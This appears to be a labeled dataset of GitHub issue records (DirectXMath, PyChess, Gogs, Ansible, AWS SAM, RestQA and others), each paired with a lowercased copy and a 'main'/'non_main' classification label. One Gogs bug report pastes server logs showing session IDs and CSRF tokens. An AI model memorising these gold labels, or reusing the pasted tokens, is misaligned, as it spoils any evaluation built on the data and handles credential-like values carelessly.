simplify communication interface the current list of functions required to implement a communication backend is currently this is the following cross product for each pod char int double send reveive x synchronous asynchronous broadcast x pod vector pointer to pod size instead we could do as boost asio does and implement a const buffer for sending and a mutable buffer for receiving data those buffers are essentially just a pointer and a size the three versions for pod vector pointer to pod size can the be implemented in terms of sending or receiving a buffer as non virtual functions in com communication thus we would reduce the cross product for each pod char int double to send reveive x synchronous asynchronous broadcast we could also remove all functions except buffer calls from the communication module and require some sort of com buffer to be called at the call side similar to this would make debugging and adding new back ends easier it also reduces possible traps as there is only one function to implement per type and purpose
1
3,077
11,646,097,361
IssuesEvent
2020-03-01 06:41:21
microsoft/DirectXMath
https://api.github.com/repos/microsoft/DirectXMath
closed
Remove VS 2015 compiler support
maintainence
This mostly allows me to remove the following workaround which was for VS 2015 RTM: ``` #if defined(_MSC_VER) && (_MSC_FULL_VER < 190023506) #define XM_CONST const #define XM_CONSTEXPR #else #define XM_CONST constexpr #define XM_CONSTEXPR constexpr #endif ```
True
Remove VS 2015 compiler support - This mostly allows me to remove the following workaround which was for VS 2015 RTM: ``` #if defined(_MSC_VER) && (_MSC_FULL_VER < 190023506) #define XM_CONST const #define XM_CONSTEXPR #else #define XM_CONST constexpr #define XM_CONSTEXPR constexpr #endif ```
main
remove vs compiler support this mostly allows me to remove the following workaround which was for vs rtm if defined msc ver msc full ver define xm const const define xm constexpr else define xm const constexpr define xm constexpr constexpr endif
1
3,317
12,876,713,182
IssuesEvent
2020-07-11 06:40:35
pychess/pychess
https://api.github.com/repos/pychess/pychess
closed
Create __doc__ strings
Easy-Fix Maintainability task
Original [issue 89](https://code.google.com/p/pychess/issues/detail?id=89) reported by [lobais](https://code.google.com/u/lobais/) 2006-11-21 PyChess needs better documentation. It should be added by creating a __doc__ string in most methods and functions, e.g.: def function (): """ This is documentation This function does no good. """
True
Create __doc__ strings - Original [issue 89](https://code.google.com/p/pychess/issues/detail?id=89) reported by [lobais](https://code.google.com/u/lobais/) 2006-11-21 PyChess needs better documentation. It should be added by creating a __doc__ string in most methods and functions, e.g.: def function (): """ This is documentation This function does no good. """
main
create doc strings original reported by pychess needs better documentation it should be added by creating a doc string in most methods and functions e g def function this is documentation this function does no good
1
727
4,318,962,149
IssuesEvent
2016-07-24 11:08:22
gogits/gogs
https://api.github.com/repos/gogits/gogs
closed
Change Owner of Repository, Whitescreen
kind/bug kind/ui status/assigned to maintainer status/needs feedback
- Gogs version (or commit ref): 0.9.28.0527 - Git version: git version 2.6.4 (Apple Git-63) - Operating system: Mac OSX - Database: - [ ] PostgreSQL - [ ] MySQL - [x] SQLite - Can you reproduce the bug at http://try.gogs.io: - [ ] Yes (provide example URL) - [X] No - [ ] Not relevant - Log gist: https://gist.github.com/shyim/763f4c8ca24c8271b4758550e19fd553 ``` Macaron] 2016-05-31 16:33:13: Started POST /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: XH8AjUqzTi4035s5jpLPcM1GFvw6MTQ2NDcwNTE5MzEyNDEzNDAzNw== [Macaron] 2016-05-31 16:33:13: Completed /org/company.domain/settings 400 Bad Request in 1.511108ms [Macaron] 2016-05-31 16:33:13: Started GET /favicon.ico for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: mrc4c20J9sCCL3qsw5gI5hxHG5c6MTQ2NDcwNTE5MzI4NTMxNzg1OQ== [Macaron] 2016-05-31 16:33:13: Completed /favicon.ico 302 Found in 968.711µs [Macaron] 2016-05-31 16:33:13: Started GET /user/login for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: mrc4c20J9sCCL3qsw5gI5hxHG5c6MTQ2NDcwNTE5MzI4NTMxNzg1OQ== [Macaron] 2016-05-31 16:33:13: Completed /user/login 302 Found in 1.608576ms [Macaron] 2016-05-31 16:33:13: Started GET /favicon.ico for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== [Macaron] 2016-05-31 16:33:13: Completed /favicon.ico 200 OK in 1.988945ms [Macaron] 2016-05-31 16:33:18: Started GET /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:18 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:18 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== 2016/05/31 16:33:18 [D] Template: repo/settings/options [Macaron] 2016-05-31 16:33:18: Completed /org/company.domain/settings 200 OK in 93.066483ms [Macaron] 2016-05-31 16:33:27: Started POST /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:27 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:27 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== [Macaron] 2016-05-31 16:33:27: Completed /org/company.domain/settings 404 Not Found in 84.603122ms ``` ## Description Open a Repository in a Organization, go to Settings and move the Repository to a another Organization
True
Change Owner of Repository, Whitescreen - - Gogs version (or commit ref): 0.9.28.0527 - Git version: git version 2.6.4 (Apple Git-63) - Operating system: Mac OSX - Database: - [ ] PostgreSQL - [ ] MySQL - [x] SQLite - Can you reproduce the bug at http://try.gogs.io: - [ ] Yes (provide example URL) - [X] No - [ ] Not relevant - Log gist: https://gist.github.com/shyim/763f4c8ca24c8271b4758550e19fd553 ``` Macaron] 2016-05-31 16:33:13: Started POST /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: XH8AjUqzTi4035s5jpLPcM1GFvw6MTQ2NDcwNTE5MzEyNDEzNDAzNw== [Macaron] 2016-05-31 16:33:13: Completed /org/company.domain/settings 400 Bad Request in 1.511108ms [Macaron] 2016-05-31 16:33:13: Started GET /favicon.ico for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: mrc4c20J9sCCL3qsw5gI5hxHG5c6MTQ2NDcwNTE5MzI4NTMxNzg1OQ== [Macaron] 2016-05-31 16:33:13: Completed /favicon.ico 302 Found in 968.711µs [Macaron] 2016-05-31 16:33:13: Started GET /user/login for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: mrc4c20J9sCCL3qsw5gI5hxHG5c6MTQ2NDcwNTE5MzI4NTMxNzg1OQ== [Macaron] 2016-05-31 16:33:13: Completed /user/login 302 Found in 1.608576ms [Macaron] 2016-05-31 16:33:13: Started GET /favicon.ico for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== [Macaron] 2016-05-31 16:33:13: Completed /favicon.ico 200 OK in 1.988945ms [Macaron] 2016-05-31 16:33:18: Started GET /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:18 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:18 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== 2016/05/31 16:33:18 [D] Template: repo/settings/options [Macaron] 2016-05-31 16:33:18: Completed /org/company.domain/settings 200 OK in 93.066483ms [Macaron] 2016-05-31 16:33:27: Started POST /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:27 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:27 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== [Macaron] 2016-05-31 16:33:27: Completed /org/company.domain/settings 404 Not Found in 84.603122ms ``` ## Description Open a Repository in a Organization, go to Settings and move the Repository to a another Organization
main
change owner of repository whitescreen gogs version or commit ref git version git version apple git operating system mac osx database postgresql mysql sqlite can you reproduce the bug at yes provide example url no not relevant log gist macaron started post org company domain settings for session id csrf token completed org company domain settings bad request in started get favicon ico for session id csrf token completed favicon ico found in started get user login for session id csrf token completed user login found in started get favicon ico for session id csrf token completed favicon ico ok in started get org company domain settings for session id csrf token template repo settings options completed org company domain settings ok in started post org company domain settings for session id csrf token completed org company domain settings not found in description open a repository in a organization go to settings and move the repository to a another organization
1
3,202
12,229,251,272
IssuesEvent
2020-05-03 23:14:26
backdrop-ops/contrib
https://api.github.com/repos/backdrop-ops/contrib
closed
Application to join: rositis
Maintainer application Port in progress
**The name of your module, theme, or layout** Hook Post Action **Post a link here to an issue in the drupal.org queue notifying Drupal 7 maintainers that you are working on a Backdrop port of their project** https://www.drupal.org/project/hook_post_action/issues/3130683 **Do you agree to the [Backdrop Contributed Project Agreement](https://github.com/backdrop-ops/contrib#backdrop-contributed-project-agreement)** Yes **Post a link to your new Backdrop project under your own GitHub account** https://github.com/rositis/hook_post_action Once we have a chance to review your project, we may provide feedback that's meant to be helpful. If everything checks out, you will be invited to the @backdrop-contrib group, and will be able to transfer the project 😉
True
Application to join: rositis - **The name of your module, theme, or layout** Hook Post Action **Post a link here to an issue in the drupal.org queue notifying Drupal 7 maintainers that you are working on a Backdrop port of their project** https://www.drupal.org/project/hook_post_action/issues/3130683 **Do you agree to the [Backdrop Contributed Project Agreement](https://github.com/backdrop-ops/contrib#backdrop-contributed-project-agreement)** Yes **Post a link to your new Backdrop project under your own GitHub account** https://github.com/rositis/hook_post_action Once we have a chance to review your project, we may provide feedback that's meant to be helpful. If everything checks out, you will be invited to the @backdrop-contrib group, and will be able to transfer the project 😉
main
application to join rositis the name of your module theme or layout hook post action post a link here to an issue in the drupal org queue notifying drupal maintainers that you are working on a backdrop port of their project do you agree to the yes post a link to your new backdrop project under your own github account once we have a chance to review your project we may provide feedback that s meant to be helpful if everything checks out you will be invited to the backdrop contrib group and will be able to transfer the project 😉
1
709
4,287,788,788
IssuesEvent
2016-07-17 00:51:16
gogits/gogs
https://api.github.com/repos/gogits/gogs
closed
Did not validate attributes fetch from LDAP
kind/bug status/assigned to maintainer status/needs feedback
## Description - Gogs version (or commit ref): 0.8.25 - Git version: 1.9.1 - Operating system: Ubuntu 14.04.4 LTS - Database: MySQL - Auth type: Simple auth - User DN: `cn=%s,ou=people,dc=test,dc=com` - User Filter: `(cn=%s)` - Username attribute: `displayName` **[Step to reproduce]** 1. Config the Gogs v0.8.25 with OpenLDAP simple auth. 2. Config the `Username attribute` with a ldap entry which can return value with white space e.g. `displayName` 3. Log in Gogs with a user which has white space in `displayName`field. **[Expect result]** user cannot log in **[Actual result]** user can login **[Parent issue]** https://github.com/gogits/gogs/issues/2709
True
Did not validate attributes fetch from LDAP - ## Description - Gogs version (or commit ref): 0.8.25 - Git version: 1.9.1 - Operating system: Ubuntu 14.04.4 LTS - Database: MySQL - Auth type: Simple auth - User DN: `cn=%s,ou=people,dc=test,dc=com` - User Filter: `(cn=%s)` - Username attribute: `displayName` **[Step to reproduce]** 1. Config the Gogs v0.8.25 with OpenLDAP simple auth. 2. Config the `Username attribute` with a ldap entry which can return value with white space e.g. `displayName` 3. Log in Gogs with a user which has white space in `displayName`field. **[Expect result]** user cannot log in **[Actual result]** user can login **[Parent issue]** https://github.com/gogits/gogs/issues/2709
main
did not validate attributes fetch from ldap description gogs version or commit ref git version operating system ubuntu lts database mysql auth type simple auth user dn cn s ou people dc test dc com user filter cn s username attribute displayname config the gogs with openldap simple auth config the username attribute with a ldap entry which can return value with white space e g displayname log in gogs with a user which has white space in displayname field user cannot log in user can login
1
1,230
5,245,589,845
IssuesEvent
2017-02-01 05:21:39
ansible/ansible-modules-extras
https://api.github.com/repos/ansible/ansible-modules-extras
closed
timezone cannot change timezone in systemd based containers
affects_2.2 bug_report waiting_on_maintainer
In my playbook, I got the following: ``` - name: Set timezone to CEST. timezone: name: Europe/Berlin when: "'{{ansible_virtualization_role}}' != 'guest'" ``` The condition was added as a workaround, because in the Debian Stretch, systemd based LXC container, timedatectl reports: > Failed to create bus connection: No such file or directory This is likely because systemd-timesyncd and systemd-timedated are disabled in virtual machines, but Ansible insists on using them to change the timezone. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME - timezone ##### ANSIBLE VERSION <!--- Paste verbatim output from “ansible --version” between quotes below --> ``` ansible 2.2.0.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION ``` - name: Set timezone to CEST. timezone: name: Europe/Berlin ``` ##### OS / ENVIRONMENT Running on Debian Testing, managing Debian Testing container running under LXC on Turris Omnia, OpenWRT kernel. ##### SUMMARY Changing the timezone is definitely possible without timedatectl. It could also be that Debian falsely disables systemd-timedated inside the container when there is virtualization, of that I am not entirely sure. ##### STEPS TO REPRODUCE Use example above on LXC Debian Stretch container. ##### EXPECTED RESULTS Expected to change /etc/timezone ##### ACTUAL RESULTS Crashed ansible playbook.
True
timezone cannot change timezone in systemd based containers - In my playbook, I got the following: ``` - name: Set timezone to CEST. timezone: name: Europe/Berlin when: "'{{ansible_virtualization_role}}' != 'guest'" ``` The condition was added as a workaround, because in the Debian Stretch, systemd based LXC container, timedatectl reports: > Failed to create bus connection: No such file or directory This is likely because systemd-timesyncd and systemd-timedated are disabled in virtual machines, but Ansible insists on using them to change the timezone. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME - timezone ##### ANSIBLE VERSION <!--- Paste verbatim output from “ansible --version” between quotes below --> ``` ansible 2.2.0.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION ``` - name: Set timezone to CEST. timezone: name: Europe/Berlin ``` ##### OS / ENVIRONMENT Running on Debian Testing, managing Debian Testing container running under LXC on Turris Omnia, OpenWRT kernel. ##### SUMMARY Changing the timezone is definitely possible without timedatectl. It could also be that Debian falsely disables systemd-timedated inside the container when there is virtualization, of that I am not entirely sure. ##### STEPS TO REPRODUCE Use example above on LXC Debian Stretch container. ##### EXPECTED RESULTS Expected to change /etc/timezone ##### ACTUAL RESULTS Crashed ansible playbook.
main
timezone cannot change timezone in systemd based containers in my playbook i got the following name set timezone to cest timezone name europe berlin when ansible virtualization role guest the condition was added as a workaround because in the debian stretch systemd based lxc container timedatectl reports failed to create bus connection no such file or directory this is likely because systemd timesyncd and systemd timedated are disabled in virtual machines but ansible insists on using them to change the timezone issue type bug report component name timezone ansible version ansible config file etc ansible ansible cfg configured module search path default w o overrides configuration name set timezone to cest timezone name europe berlin os environment running on debian testing managing debian testing container running under lxc on turris omnia openwrt kernel summary changing the timezone is definitely possible without timedatectl it could also be that debian falsely disables systemd timedated inside the container when there is virtualization of that i am not entirely sure steps to reproduce use example above on lxc debian stretch container expected results expected to change etc timezone actual results crashed ansible playbook
1
692,441
23,734,880,988
IssuesEvent
2022-08-31 07:10:12
dodona-edu/dodona
https://api.github.com/repos/dodona-edu/dodona
closed
Link to the manual where possible
feature student low priority
We should take a look at the manual pages we have an think where on Dodona we could link to those pages. For example: every markdown text area should have a link to the markdown docs.
1.0
Link to the manual where possible - We should take a look at the manual pages we have an think where on Dodona we could link to those pages. For example: every markdown text area should have a link to the markdown docs.
non_main
link to the manual where possible we should take a look at the manual pages we have an think where on dodona we could link to those pages for example every markdown text area should have a link to the markdown docs
0
248,867
18,858,128,777
IssuesEvent
2021-11-12 09:25:01
kengjit/pe
https://api.github.com/repos/kengjit/pe
opened
UG - Flow was confusing
severity.Low type.DocumentationBug
There were multiple instances where Lessons/Modules were referenced before they were explained. This might confuse the reader as they do not know what they are. Refer to pg 6, 8 ![image.png](https://raw.githubusercontent.com/kengjit/pe/main/files/ef416445-8907-4396-adf7-59c998154e01.png) ![image.png](https://raw.githubusercontent.com/kengjit/pe/main/files/bdaee591-88ef-4f95-95d0-216023384d60.png) <!--session: 1636703410529-d12d539c-8c6d-4415-bfa1-4aeef6033363--> <!--Version: Web v3.4.1-->
1.0
UG - Flow was confusing - There were multiple instances where Lessons/Modules were referenced before they were explained. This might confuse the reader as they do not know what they are. Refer to pg 6, 8 ![image.png](https://raw.githubusercontent.com/kengjit/pe/main/files/ef416445-8907-4396-adf7-59c998154e01.png) ![image.png](https://raw.githubusercontent.com/kengjit/pe/main/files/bdaee591-88ef-4f95-95d0-216023384d60.png) <!--session: 1636703410529-d12d539c-8c6d-4415-bfa1-4aeef6033363--> <!--Version: Web v3.4.1-->
non_main
ug flow was confusing there were multiple instances where lessons modules were referenced before they were explained this might confuse the reader as they do not know what they are refer to pg
0
4,369
22,155,343,109
IssuesEvent
2022-06-03 21:51:32
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
reopened
Unable to create Serverless API using SAM v1.40.0
stage/bug-repro maintainer/need-followup
<!-- Make sure we don't have an existing Issue that reports the bug you are seeing (both open and closed). If you do find an existing Issue, re-open or add a comment to that Issue instead of creating a new one. --> ### Description: <!-- Briefly describe the bug you are facing.--> I tried creating a SAM application using the quick start template for serverless API, but unfortunately it complains that it's unable to local the quickstart-web template. ### Steps to reproduce: <!-- Provide detailed steps to replicate the bug, including steps from third party tools (CDK, etc.) --> ``` D:\Projects λ sam init You can preselect a particular runtime or package type when using the `sam init` experience. Call `sam init --help` to learn more. Which template source would you like to use? 1 - AWS Quick Start Templates 2 - Custom Template Location Choice: 1 Choose an AWS Quick Start application template 1 - Hello World Example 2 - Multi-step workflow 3 - Serverless API 4 - Scheduled task 5 - Standalone function 6 - Data processing 7 - Infrastructure event management 8 - Machine Learning Template: 3 Which runtime would you like to use? 1 - dotnetcore3.1 2 - nodejs14.x 3 - nodejs12.x 4 - python3.9 5 - python3.8 Runtime: 2 Based on your selections, the only Package type available is Zip. We will proceed to selecting the Package type as Zip. Based on your selections, the only dependency manager available is npm. We will proceed copying the template using npm. Project name [sam-app]: sammy Cloning from https://github.com/aws/aws-sam-cli-app-templates (process may take a moment) Error: Can't find application template quick-start-web - check valid values in interactive init. ``` ### Observed result: <!-- Please provide command output with `--debug` flag set. --> **Error: Can't find application template quick-start-web - check valid values in interactive init.** ### Expected result: <!-- Describe what you expected. --> I expected it to create Serverless API project with it's default scaffolding. ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Windows 10 Pro 2. `sam --version`: SAM CLI, version 1.40.0 3. AWS region: us-east-2
True
Unable to create Serverless API using SAM v1.40.0 - <!-- Make sure we don't have an existing Issue that reports the bug you are seeing (both open and closed). If you do find an existing Issue, re-open or add a comment to that Issue instead of creating a new one. --> ### Description: <!-- Briefly describe the bug you are facing.--> I tried creating a SAM application using the quick start template for serverless API, but unfortunately it complains that it's unable to local the quickstart-web template. ### Steps to reproduce: <!-- Provide detailed steps to replicate the bug, including steps from third party tools (CDK, etc.) --> ``` D:\Projects λ sam init You can preselect a particular runtime or package type when using the `sam init` experience. Call `sam init --help` to learn more. Which template source would you like to use? 1 - AWS Quick Start Templates 2 - Custom Template Location Choice: 1 Choose an AWS Quick Start application template 1 - Hello World Example 2 - Multi-step workflow 3 - Serverless API 4 - Scheduled task 5 - Standalone function 6 - Data processing 7 - Infrastructure event management 8 - Machine Learning Template: 3 Which runtime would you like to use? 1 - dotnetcore3.1 2 - nodejs14.x 3 - nodejs12.x 4 - python3.9 5 - python3.8 Runtime: 2 Based on your selections, the only Package type available is Zip. We will proceed to selecting the Package type as Zip. Based on your selections, the only dependency manager available is npm. We will proceed copying the template using npm. Project name [sam-app]: sammy Cloning from https://github.com/aws/aws-sam-cli-app-templates (process may take a moment) Error: Can't find application template quick-start-web - check valid values in interactive init. ``` ### Observed result: <!-- Please provide command output with `--debug` flag set. --> **Error: Can't find application template quick-start-web - check valid values in interactive init.** ### Expected result: <!-- Describe what you expected. --> I expected it to create Serverless API project with it's default scaffolding. ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Windows 10 Pro 2. `sam --version`: SAM CLI, version 1.40.0 3. AWS region: us-east-2
main
unable to create serverless api using sam make sure we don t have an existing issue that reports the bug you are seeing both open and closed if you do find an existing issue re open or add a comment to that issue instead of creating a new one description i tried creating a sam application using the quick start template for serverless api but unfortunately it complains that it s unable to local the quickstart web template steps to reproduce d projects λ sam init you can preselect a particular runtime or package type when using the sam init experience call sam init help to learn more which template source would you like to use aws quick start templates custom template location choice choose an aws quick start application template hello world example multi step workflow serverless api scheduled task standalone function data processing infrastructure event management machine learning template which runtime would you like to use x x runtime based on your selections the only package type available is zip we will proceed to selecting the package type as zip based on your selections the only dependency manager available is npm we will proceed copying the template using npm project name sammy cloning from process may take a moment error can t find application template quick start web check valid values in interactive init observed result error can t find application template quick start web check valid values in interactive init expected result i expected it to create serverless api project with it s default scaffolding additional environment details ex windows mac amazon linux etc os windows pro sam version sam cli version aws region us east
1
444,476
12,813,397,163
IssuesEvent
2020-07-04 12:45:16
abpframework/abp
https://api.github.com/repos/abpframework/abp
closed
Try to consume both of REST and gRPC services from the console client of the gRPC demo sample
abp-framework abp-samples priority:high
I created the sample: https://github.com/abpframework/abp-samples/tree/master/GrpcDemo It works. However, we have a problem: [Microsoft document](https://docs.microsoft.com/en-us/aspnet/core/tutorials/grpc/grpc-start) leads to make the server to support HTTP/2. However, client application can not call REST endpoints in this case. I couldn't be able to configure all HttpClients (those used to authenticate to IDS4 and call REST endpoints) to use Http/2. There are [solutions](https://stackoverflow.com/questions/32685151/how-to-make-the-net-httpclient-use-http-2-0) on the web, but I didn't spend much time to be honest. I disabled the related lines: https://github.com/abpframework/abp-samples/blob/master/GrpcDemo/test/GrpcDemo.HttpApi.Client.ConsoleTestApp/ConsoleTestAppHostedService.cs#L28 @maliming can you look at that. Thanks.
1.0
Try to consume both of REST and gRPC services from the console client of the gRPC demo sample - I created the sample: https://github.com/abpframework/abp-samples/tree/master/GrpcDemo It works. However, we have a problem: [Microsoft document](https://docs.microsoft.com/en-us/aspnet/core/tutorials/grpc/grpc-start) leads to make the server to support HTTP/2. However, client application can not call REST endpoints in this case. I couldn't be able to configure all HttpClients (those used to authenticate to IDS4 and call REST endpoints) to use Http/2. There are [solutions](https://stackoverflow.com/questions/32685151/how-to-make-the-net-httpclient-use-http-2-0) on the web, but I didn't spend much time to be honest. I disabled the related lines: https://github.com/abpframework/abp-samples/blob/master/GrpcDemo/test/GrpcDemo.HttpApi.Client.ConsoleTestApp/ConsoleTestAppHostedService.cs#L28 @maliming can you look at that. Thanks.
non_main
try to consume both of rest and grpc services from the console client of the grpc demo sample i created the sample it works however we have a problem leads to make the server to support http however client application can not call rest endpoints in this case i couldn t be able to configure all httpclients those used to authenticate to and call rest endpoints to use http there are on the web but i didn t spend much time to be honest i disabled the related lines maliming can you look at that thanks
0
3,972
18,268,290,969
IssuesEvent
2021-10-04 11:03:53
restqa/restqa
https://api.github.com/repos/restqa/restqa
closed
Create custom step defintion
enhancement pair with maintainer
Hello 👋, ### 👀 Background User has different need and most of the time the step definition provided by RestQA can't fully cover the user requirement. ### ✌️ What is the actual behavior? The user could use the default step definition coming with restqa. ### 🕵️‍♀️ How to reproduce the current behavior? 1. Install RestQA 2. Run the command `restqa init` to initialize a brand new project 3. Run the command `restqa steps` to take a look at the list of steps available. ### 🤞 What is the expected behavior? On some team setup we would prefer to create a specific step definition, such as inserting or deleting data from a custom system. ### 😎 Proposed solution. On the `.restqa.yml` configuration file , we could add the property `stepFiles` in the object `restqa` such as : ```yaml restqa: stepFiles: - tests/steps.js ``` The stepFiles property should include an array of filename. Each referenced file should have a specific format, example : ```js module.exports = function (cucumber) { cucumber.Given('my step', () => console.log('do Something'), 'My step definition description', 'custom tag') } ``` Cheers.
True
Create custom step defintion - Hello 👋, ### 👀 Background User has different need and most of the time the step definition provided by RestQA can't fully cover the user requirement. ### ✌️ What is the actual behavior? The user could use the default step definition coming with restqa. ### 🕵️‍♀️ How to reproduce the current behavior? 1. Install RestQA 2. Run the command `restqa init` to initialize a brand new project 3. Run the command `restqa steps` to take a look at the list of steps available. ### 🤞 What is the expected behavior? On some team setup we would prefer to create a specific step definition, such as inserting or deleting data from a custom system. ### 😎 Proposed solution. On the `.restqa.yml` configuration file , we could add the property `stepFiles` in the object `restqa` such as : ```yaml restqa: stepFiles: - tests/steps.js ``` The stepFiles property should include an array of filename. Each referenced file should have a specific format, example : ```js module.exports = function (cucumber) { cucumber.Given('my step', () => console.log('do Something'), 'My step definition description', 'custom tag') } ``` Cheers.
main
create custom step defintion hello 👋 👀 background user has different need and most of the time the step definition provided by restqa can t fully cover the user requirement ✌️ what is the actual behavior the user could use the default step definition coming with restqa 🕵️‍♀️ how to reproduce the current behavior install restqa run the command restqa init to initialize a brand new project run the command restqa steps to take a look at the list of steps available 🤞 what is the expected behavior on some team setup we would prefer to create a specific step definition such as inserting or deleting data from a custom system 😎 proposed solution on the restqa yml configuration file we could add the property stepfiles in the object restqa such as yaml restqa stepfiles tests steps js the stepfiles property should include an array of filename each referenced file should have a specific format example js module exports function cucumber cucumber given my step console log do something my step definition description custom tag cheers
1
210,915
16,396,150,591
IssuesEvent
2021-05-18 00:04:43
fga-eps-mds/MDS-2020-2-G9
https://api.github.com/repos/fga-eps-mds/MDS-2020-2-G9
closed
Atualizar o Roadmap
documentation organização
### Descrição: Adicionar as sprints 12 e 13 ### Objetivos: - [x] sprint 12 - [x] sprint 13 - [x] consertar erros
1.0
Atualizar o Roadmap - ### Descrição: Adicionar as sprints 12 e 13 ### Objetivos: - [x] sprint 12 - [x] sprint 13 - [x] consertar erros
non_main
atualizar o roadmap descrição adicionar as sprints e objetivos sprint sprint consertar erros
0
4,531
23,548,869,449
IssuesEvent
2022-08-21 14:30:18
web3phl/directory
https://api.github.com/repos/web3phl/directory
opened
info/faq page
docs feature maintainers only todo
### 🤔 Not Existing Feature Request? - [X] Yes, I'm sure, this is a new requested feature! ### 🤔 Not an Idea or Suggestion? - [X] Yes, I'm sure, this is not idea or suggestion! ### 📋 Request Details Good to have an info or faq page where people are able to see this first before the directory list. Let's make this priority! 💪 ### 📜 Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/web3phl/directory/blob/main/CODE_OF_CONDUCT.md).
True
info/faq page - ### 🤔 Not Existing Feature Request? - [X] Yes, I'm sure, this is a new requested feature! ### 🤔 Not an Idea or Suggestion? - [X] Yes, I'm sure, this is not idea or suggestion! ### 📋 Request Details Good to have an info or faq page where people are able to see this first before the directory list. Let's make this priority! 💪 ### 📜 Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/web3phl/directory/blob/main/CODE_OF_CONDUCT.md).
main
info faq page 🤔 not existing feature request yes i m sure this is a new requested feature 🤔 not an idea or suggestion yes i m sure this is not idea or suggestion 📋 request details good to have an info or faq page where people are able to see this first before the directory list let s make this priority 💪 📜 code of conduct i agree to follow this project s
1
5,507
27,493,360,763
IssuesEvent
2023-03-04 22:07:42
Windham-High-School/CubeServer
https://api.github.com/repos/Windham-High-School/CubeServer
opened
Make raspi mongo container
enhancement maintainability
Make a separate repo with a script for grabbing the latest version of a given release of mongodb from github, building, and pushing to docker hub for use with CubeServer on a raspi with arm64v8<8.2
True
Make raspi mongo container - Make a separate repo with a script for grabbing the latest version of a given release of mongodb from github, building, and pushing to docker hub for use with CubeServer on a raspi with arm64v8<8.2
main
make raspi mongo container make a separate repo with a script for grabbing the latest version of a given release of mongodb from github building and pushing to docker hub for use with cubeserver on a raspi with
1
62,127
17,023,856,194
IssuesEvent
2021-07-03 04:12:21
tomhughes/trac-tickets
https://api.github.com/repos/tomhughes/trac-tickets
closed
Latitude/longitude text overflow
Component: potlatch2 Priority: minor Resolution: duplicate Type: defect
**[Submitted to the original trac issue database at 11.47pm, Wednesday, 6th March 2013]** Under options, you can select Show mouse latitude/longitude When the numeric value of the longitude exceeds -99 degrees, the latitude drops out of the window. The window appears to have room for the sign, 2 digits,a decimal, and 5 digits. ``` -78.07526 48.42046 ``` When the longitude exceeds 99 degrees, the sign stays on the first line, and the longitude value gets bumped to the second line, and the latitude is no longer visible ``` - 113.54634 ``` Positive longitude values are not affected, only negative values over 99 degrees. Negative latitude values are fine as they can not exceed 90.
1.0
Latitude/longitude text overflow - **[Submitted to the original trac issue database at 11.47pm, Wednesday, 6th March 2013]** Under options, you can select Show mouse latitude/longitude When the numeric value of the longitude exceeds -99 degrees, the latitude drops out of the window. The window appears to have room for the sign, 2 digits,a decimal, and 5 digits. ``` -78.07526 48.42046 ``` When the longitude exceeds 99 degrees, the sign stays on the first line, and the longitude value gets bumped to the second line, and the latitude is no longer visible ``` - 113.54634 ``` Positive longitude values are not affected, only negative values over 99 degrees. Negative latitude values are fine as they can not exceed 90.
non_main
latitude longitude text overflow under options you can select show mouse latitude longitude when the numeric value of the longitude exceeds degrees the latitude drops out of the window the window appears to have room for the sign digits a decimal and digits when the longitude exceeds degrees the sign stays on the first line and the longitude value gets bumped to the second line and the latitude is no longer visible positive longitude values are not affected only negative values over degrees negative latitude values are fine as they can not exceed
0
2,874
10,276,059,346
IssuesEvent
2019-08-24 14:00:13
arcticicestudio/arctic
https://api.github.com/repos/arcticicestudio/arctic
closed
Husky
context-workflow scope-dx scope-maintainability scope-quality type-feature
